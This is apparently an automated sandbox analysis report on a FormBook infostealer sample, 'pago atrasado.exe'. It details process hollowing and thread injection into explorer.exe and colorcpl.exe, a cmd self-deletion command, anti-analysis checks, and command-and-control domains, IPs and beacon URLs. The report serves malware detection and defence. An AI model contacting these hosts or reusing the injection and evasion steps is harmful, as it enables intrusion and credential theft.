          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04548A0A mov eax, dword ptr fs:[00000030h]16_2_04548A0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EFE3F mov eax, dword ptr fs:[00000030h]16_2_045EFE3F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453E620 mov eax, dword ptr fs:[00000030h]16_2_0453E620
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h]16_2_04574A2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04574A2C mov eax, dword ptr fs:[00000030h]16_2_04574A2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04578EC7 mov eax, dword ptr fs:[00000030h]16_2_04578EC7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045636CC mov eax, dword ptr fs:[00000030h]16_2_045636CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562ACB mov eax, dword ptr fs:[00000030h]16_2_04562ACB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045EFEC0 mov eax, dword ptr fs:[00000030h]16_2_045EFEC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04562AE4 mov eax, dword ptr fs:[00000030h]16_2_04562AE4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045616E0 mov ecx, dword ptr fs:[00000030h]16_2_045616E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608ED6 mov eax, dword ptr fs:[00000030h]16_2_04608ED6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045476E2 mov eax, dword ptr fs:[00000030h]16_2_045476E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h]16_2_0456D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456D294 mov eax, dword ptr fs:[00000030h]16_2_0456D294
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h]16_2_04600EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h]16_2_04600EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04600EA5 mov eax, dword ptr fs:[00000030h]16_2_04600EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CFE87 mov eax, dword ptr fs:[00000030h]16_2_045CFE87
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h]16_2_0454AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454AAB0 mov eax, dword ptr fs:[00000030h]16_2_0454AAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456FAB0 mov eax, dword ptr fs:[00000030h]16_2_0456FAB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]16_2_045352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]16_2_045352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]16_2_045352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]16_2_045352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045352A5 mov eax, dword ptr fs:[00000030h]16_2_045352A5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B46A7 mov eax, dword ptr fs:[00000030h]16_2_045B46A7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608F6A mov eax, dword ptr fs:[00000030h]16_2_04608F6A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453F358 mov eax, dword ptr fs:[00000030h]16_2_0453F358
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453DB40 mov eax, dword ptr fs:[00000030h]16_2_0453DB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454EF40 mov eax, dword ptr fs:[00000030h]16_2_0454EF40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h]16_2_04563B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04563B7A mov eax, dword ptr fs:[00000030h]16_2_04563B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0453DB60 mov ecx, dword ptr fs:[00000030h]16_2_0453DB60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0454FF60 mov eax, dword ptr fs:[00000030h]16_2_0454FF60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04608B58 mov eax, dword ptr fs:[00000030h]16_2_04608B58
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0455F716 mov eax, dword ptr fs:[00000030h]16_2_0455F716
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045F131B mov eax, dword ptr fs:[00000030h]16_2_045F131B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h]16_2_045CFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045CFF10 mov eax, dword ptr fs:[00000030h]16_2_045CFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h]16_2_0456A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456A70E mov eax, dword ptr fs:[00000030h]16_2_0456A70E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0456E730 mov eax, dword ptr fs:[00000030h]16_2_0456E730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460070D mov eax, dword ptr fs:[00000030h]16_2_0460070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0460070D mov eax, dword ptr fs:[00000030h]16_2_0460070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h]16_2_04534F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04534F2E mov eax, dword ptr fs:[00000030h]16_2_04534F2E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h]16_2_045B53CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045B53CA mov eax, dword ptr fs:[00000030h]16_2_045B53CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045737F5 mov eax, dword ptr fs:[00000030h]16_2_045737F5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]16_2_045603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]16_2_045603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]16_2_045603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]16_2_045603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]16_2_045603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045603E2 mov eax, dword ptr fs:[00000030h]16_2_045603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04548794 mov eax, dword ptr fs:[00000030h]16_2_04548794
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 1_2_00409B30 LdrLoadDll,1_2_00409B30
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10009B50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10009B50

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exeDomain query: www.ttemola.com
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 46.101.121.244 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.134 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.baybeg.com
          Source: C:\Windows\explorer.exeDomain query: www.everythangbutwhite.com
          Source: C:\Windows\explorer.exeDomain query: www.highvizpeople.com
          Source: C:\Windows\explorer.exeDomain query: www.itskosi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.oddanimalsink.com
          Source: C:\Windows\explorer.exeDomain query: www.ishhs.xyz
          Source: C:\Windows\explorer.exeDomain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exeDomain query: www.umgaleloacademy.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\pago atrasado.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\pago atrasado.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\pago atrasado.exeMemory written: C:\Users\user\Desktop\pago atrasado.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\pago atrasado.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\pago atrasado.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'Jump to behavior
          Source: explorer.exe, 00000002.00000000.275805694.00000000089FF000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.281510605.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_100098CF cpuid 0_2_100098CF
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_10012E00 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_10012E00
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Application Shimming1Process Injection612Virtualization/Sandbox Evasion2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Process Injection612LSASS MemorySecurity Software Discovery151Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502137 Sample: pago atrasado.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 31 www.shopthatlookboutique.com 2->31 33 www.christinegagnonjewellery.com 2->33 35 shops.myshopify.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 5 other signatures 2->49 11 pago atrasado.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\xpbpx.dll, PE32 11->29 dropped 63 Injects a PE file into a foreign processes 11->63 15 pago atrasado.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.itskosi.com 18->37 39 www.crisisinterventionadvocates.com 74.208.236.134, 49793, 80 ONEANDONE-ASBrauerstrasse48DE United States 18->39 41 10 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 53 Performs DNS queries to domains with low reputation 18->53 22 colorcpl.exe 18->22         started        signatures11 process12 signatures13 55 Self deletion via cmd delete 22->55 57 Modifies the context of a thread in another process (thread injection) 22->57 59 Maps a DLL or memory area into another process 22->59 61 Tries to detect virtualization through RDTSC time measurements 22->61 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          pago atrasado.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.pago atrasado.exe.2330000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.pago atrasado.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.pago atrasado.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          16.2.colorcpl.exe.4a4796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          16.2.colorcpl.exe.2b2c88.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.pago atrasado.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.pago atrasado.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.pago atrasado.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff20%Avira URL Cloudsafe
          www.crisisinterventionadvocates.com/u9xn/0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf0%Avira URL Cloudsafe
          http://www.highvizpeople.com/Migraine_Pain_Relief.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans0%Avira URL Cloudsafe
          http://www.oddanimalsink.com/u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://www.highvizpeople.com/__media__/js/trademark.php?d=highvizpeople.com&type=ns0%Avira URL Cloudsafe
          http://www.crisisinterventionadvocates.com/u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://www.highvizpeople.com/song_lyrics.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FLdrtTp0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf0%Avira URL Cloudsafe
          http://www.highvizpeople.com/__media__/design/underconstructionnotice.php?d=highvizpeople.com0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/27587/Right.png)0%Avira URL Cloudsafe
          http://www.highvizpeople.com/px.js?ch=20%Avira URL Cloudsafe
          http://www.highvizpeople.com/px.js?ch=10%Avira URL Cloudsafe
          http://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix0%Avira URL Cloudsafe
          http://www.highvizpeople.com/10_Best_Mutual_Funds.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX0%Avira URL Cloudsafe
          http://www.highvizpeople.com/Best_Penny_Stocks.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2F0%Avira URL Cloudsafe
          http://www.highvizpeople.com/Accident_Lawyers.cfm?fp=lEL3szcLRiQ3X72dJydtT9fP1DR49HnC0B3XMUp8zSX%2FL0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/27587/Left.png)0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
          http://www.everythangbutwhite.com/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff20%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot0%Avira URL Cloudsafe
          http://www.highvizpeople.com/u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo0%Avira URL Cloudsafe
          http://www.highvizpeople.com/sk-logabpstatus.php?a=MzZzaVd5UDZhY0hEU3Z1UzFXVHRjNXcrTjlwaWZWbWlYbHV5Y0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)0%Avira URL Cloudsafe
          http://www.everythangbutwhite.com/0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix0%Avira URL Cloudsafe
          http://www.highvizpeople.com/display.cfm0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf0%Avira URL Cloudsafe
          http://www.Highvizpeople.com0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot0%Avira URL Cloudsafe
          http://www.everythangbutwhite.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.everythangbutwhite.com
          		3.64.163.50
          		truetrue
            		unknown
            oddanimalsink.com
            		34.102.136.180
            		truefalse
              		unknown
              www.highvizpeople.com
              		208.91.197.27
              		truetrue
                		unknown
                www.itskosi.com
                		46.101.121.244
                		truetrue
                  		unknown
                  www.crisisinterventionadvocates.com
                  		74.208.236.134
                  		truetrue
                    		unknown
                    shops.myshopify.com
                    		23.227.38.74
                    		truefalse
                      		unknown
                      www.baybeg.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.shopthatlookboutique.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.christinegagnonjewellery.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ttemola.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.oddanimalsink.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.ishhs.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.sfcn-dng.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.umgaleloacademy.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      www.crisisinterventionadvocates.com/u9xn/true
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.oddanimalsink.com/u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdofalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.crisisinterventionadvocates.com/u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdotrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdotrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.everythangbutwhite.com/u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdotrue
                                      • Avira URL Cloud: safe
                                      		unknown
